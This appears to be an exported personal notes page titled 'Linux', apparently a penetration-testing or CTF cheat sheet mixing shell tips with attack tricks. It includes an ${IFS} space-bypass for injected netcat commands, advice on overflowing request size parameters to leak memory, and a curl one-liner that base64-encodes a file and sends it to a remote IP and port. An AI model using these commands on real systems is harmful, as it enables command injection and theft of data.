<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../style.css">
    <base target="_parent">
    <title data-trilium-title>Linux</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Linux</h1>

      <div class="ck-content">
        <p>space bash</p>
        <p><code>${IFS}</code> is a space delimiter for when you can't use a space
          in your rce command, so you can do <code>nc${IFS}&lt;ip&gt;${IFS}&lt;port&gt;</code>

        </p>
        <p>If you have any parameters(that can be modified as in a web request),
          try overflowing the value(size) by specifying a very large size to see
          if there is any memory leak,(you might need to change memory size to get
          a memory leak with useful data) but a large enough one might work too and
          give some internal useful data like headers/secrets.</p>
        <p>To get date in epoch format, use <code>date '+%s'</code>

        </p>
        <p>to find duplicates in a file, use: <code>sort rooms.txt | uniq -cd</code>

        </p>
        <p>To exfill data from the command line, use:</p><pre><code class="language-text-plain">cat /home/dante/Downloads/.download.dat | base64 -w0 | xargs -I T curl 10.10.126.249:4444/?x=T</code></pre>
      </div>
    </div>
  </body>

</html>